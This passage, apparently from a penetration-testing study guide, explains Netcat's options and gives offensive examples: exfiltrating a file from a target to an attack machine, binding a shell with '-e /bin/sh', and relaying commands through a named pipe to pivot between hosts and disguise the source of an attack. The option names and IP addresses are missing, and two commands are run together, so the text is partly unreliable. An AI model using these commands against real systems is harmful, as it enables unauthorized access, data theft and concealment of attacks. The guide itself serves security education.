Netcat is a command-line utility used to read from or write to TCP, UDP, or Unix domain socket network connections. Highly versatile, it has been called the "Swiss Army knife" of hacking tools. It can create or connect to a TCP server, act as a simple proxy or relay, transfer files, launch executables (such as the backdoor shells mentioned previously) when a connection is made, test services and daemons, and even port scan. Netcat has been ported to most desktop platforms and has inspired similar tools such as Ncat and Simple Netcat for Android.

The basic syntax of Netcat is nc [options] [target address] [port(s)]. Common options include the following.

Netcat Option



Starts Netcat in listen mode. The default mode is to act as a client.


Starts Netcat in the Windows-only "listen harder" mode. This mode creates a persistent listener that starts listening again when the client disconnects.


Starts Netcat in UDP mode. The default is to use TCP.


Specifies the port that Netcat should start listening on in listen mode. In client mode, it specifies the source port.


Specifies the program to execute when a connection is made.


Tells Netcat not to perform DNS lookups for host names on the other end of the connection.


Starts Netcat in zero I/O mode, which instructs it to send a packet without a payload.

-w <seconds>

Specifies the timeout value for connections.


Starts Netcat in verbose mode.


Starts Netcat in very verbose mode.

In addition to the standard bind and reverse shell commands mentioned previously, you can use Netcat in other ways to facilitate persistence. For example, let's say you want to exfiltrate a file called data.txt from a target system onto your attack machine. The process is similar to setting up a reverse shell. On the attack machine, set up the listener and output the file:

nc -lp 12345 > data.txt

Then, on the target machine, start the connection and pass in the file:

nc 12345 < data.txt

Your listener will grab the file and then save it.

You can also use Netcat to create a relay using a Linux named pipe. The listener waits for incoming data on local port 12345 and then forwards it to port 54321 of a second target host ( First, start a listener on your attack machine:

nc -lp 12345

Then, start a listener on the second target host that binds a shell:

nc -lp 54321 -e /bin/sh

On the initial target host, create a named pipe and set up the relay:

mknod backpipe p nc 12345 0<backpipe | nc 54321 | tee backpipe

Now, any commands issued from your attack machine will be relayed through the initial target host and hit the second target host. Relaying data like this can help you pivot your attack and make it appear as if the initial target host is the one attacking the second target host.

Note: For additional Netcat examples, see the SANS Netcat Cheat Sheet at